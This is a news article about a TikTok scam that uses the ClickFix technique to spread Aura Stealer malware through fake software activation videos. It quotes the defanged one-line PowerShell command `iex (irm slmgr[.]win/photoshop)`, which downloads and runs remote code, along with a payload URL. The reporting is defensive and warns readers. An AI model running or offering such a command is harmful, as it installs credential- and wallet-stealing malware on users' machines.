Dataconomy
  • News
    • Artificial Intelligence
    • Cybersecurity
    • DeFi & Blockchain
    • Finance
    • Gaming
    • Startups
    • Tech
  • Industry
  • Research
  • Resources
    • Articles
    • Guides
    • Case Studies
    • Whitepapers
    • AI Models Leaderboard
  • AI toolsNEW
  • Newsletter
  • + More
    • Glossary
    • Conversations
    • Events
    • About
      • Who we are
      • Contact
      • Imprint
      • Legal & Privacy
      • Partner With Us
Subscribe
No Result
View All Result
  • AI
  • Tech
  • Cybersecurity
  • Finance
  • DeFi & Blockchain
  • Startups
  • Gaming
Dataconomy
  • News
    • Artificial Intelligence
    • Cybersecurity
    • DeFi & Blockchain
    • Finance
    • Gaming
    • Startups
    • Tech
  • Industry
  • Research
  • Resources
    • Articles
    • Guides
    • Case Studies
    • Whitepapers
    • AI Models Leaderboard
  • AI toolsNEW
  • Newsletter
  • + More
    • Glossary
    • Conversations
    • Events
    • About
      • Who we are
      • Contact
      • Imprint
      • Legal & Privacy
      • Partner With Us
Subscribe
No Result
View All Result
Dataconomy
No Result
View All Result

TikTok’s latest scam teaches users how to infect their own PCs

The scam uses a ClickFix technique that convinces viewers to paste and run malicious PowerShell commands with admin privileges.

byEmre Çıtak
October 20, 2025
in Cybersecurity, News
Home News Cybersecurity
Share on FacebookShare on TwitterShare on LinkedInShare on WhatsAppShare on e-mail
Google Preferred Source

Cybercriminals are distributing information-stealing malware on TikTok using videos disguised as free software activation guides. According to BleepingComputer, ISC Handler Xavier Mertens identified the ongoing campaign, which employs a social engineering method known as a ClickFix attack to infect computer systems.

The videos, observed by BleepingComputer, claim to provide instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. The campaign also promotes fictitious services, including “Netflix Premium” and “Spotify Premium.” Mertens noted this activity is largely the same as a campaign previously observed by the security firm Trend Micro in May. The videos use a social engineering technique that presents a seemingly valid fix or set of instructions to deceive users into compromising their own machines.

This ClickFix attack tricks users into executing malicious PowerShell commands. Each video displays a one-line command, such as `iex (irm slmgr[.]win/photoshop)`, and instructs viewers to run it with administrator privileges. The program name in the URL is modified to match the software being impersonated; a fake Windows guide would use a URL containing “windows” instead of “photoshop.”

Stay Ahead of the Curve!

Don't miss out on the latest insights, trends, and analysis in the world of data, technology, and startups. Subscribe to our newsletter and get exclusive content delivered straight to your inbox.

When the command is executed, PowerShell connects to the remote site `slmgr[.]win` to retrieve and run another PowerShell script. This script downloads two executables from Cloudflare pages. The first, from `https://file-epq[.]pages[.]dev/updater.exe`, is a variant of Aura Stealer malware. This infostealer is designed to harvest saved browser credentials, authentication cookies, cryptocurrency wallet data, and other application credentials. The stolen data is then uploaded to the attackers, granting them access to the victim’s accounts.

A second payload, `source.exe`, is also downloaded as part of the attack. According to Mertens, this executable self-compiles code using .NET’s built-in Visual C# Compiler (`csc.exe`). The resulting code is subsequently injected and launched directly in memory. The specific purpose of this additional payload remains unclear.

Users who have performed these steps should consider all of their credentials compromised. The recommended course of action is to immediately reset passwords on all sites and services they use to prevent unauthorized account access and further data theft.

ClickFix attacks have become popular over the past year and are used to distribute various malware strains in ransomware and cryptocurrency theft campaigns. As a general rule, users should never copy text from a website and run it in an operating system dialog box. This advisory includes the File Explorer address bar, command prompt, PowerShell prompts, the macOS terminal, and Linux shells.


Featured image credit

Tags: scamtiktok

Related Posts

OpenAI retires Atlas browser to focus on new ChatGPT superapp

OpenAI retires Atlas browser to focus on new ChatGPT superapp

July 14, 2026
Microsoft tests Copilot’s new PC insights feature in Windows 11

Microsoft tests Copilot’s new PC insights feature in Windows 11

July 14, 2026
Xiaomi unveils SkyNomad N90 range-extender SUV

Xiaomi unveils SkyNomad N90 range-extender SUV

July 14, 2026
X algorithm update aims to make replies feel friendlier

X algorithm update aims to make replies feel friendlier

July 14, 2026
Windows 11 Search Box gets less clutter and more control

Windows 11 Search Box gets less clutter and more control

July 14, 2026
Pixel 11 leak shows bold magenta and peach colors

Pixel 11 leak shows bold magenta and peach colors

July 14, 2026

LATEST NEWS

OpenAI retires Atlas browser to focus on new ChatGPT superapp

Microsoft tests Copilot’s new PC insights feature in Windows 11

Xiaomi unveils SkyNomad N90 range-extender SUV

X algorithm update aims to make replies feel friendlier

Windows 11 Search Box gets less clutter and more control

Pixel 11 leak shows bold magenta and peach colors

BEST AI MODELS LEADERBOARD

See the best AI models, ranked by intelligence, benchmark results, speed and token price. Find the most suitable LLMs, Text-to-Image, Image Editing, Text-to-Speech, Text-to-Video and Image-to-Video  artificial intelligence model for your tasks and business.

LATEST TOOLS

Animate Old Photos

Resume.io

MonAI

AIEngine Plugin

Neuraspace

Mootion

Legacy AI

Copyseeker

ProPhotos

Kuki AI

Dataconomy

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • About
  • Imprint
  • Contact
  • Legal & Privacy

Follow Us

  • News
    • Artificial Intelligence
    • Cybersecurity
    • DeFi & Blockchain
    • Finance
    • Gaming
    • Startups
    • Tech
  • Industry
  • Research
  • Resources
    • Articles
    • Guides
    • Case Studies
    • Whitepapers
    • AI Models Leaderboard
  • AI tools
  • Newsletter
  • + More
    • Glossary
    • Conversations
    • Events
    • About
      • Who we are
      • Contact
      • Imprint
      • Legal & Privacy
      • Partner With Us
No Result
View All Result
Subscribe

This website uses cookies to improve your experience. You can choose to accept or reject them. Visit our Privacy Policy.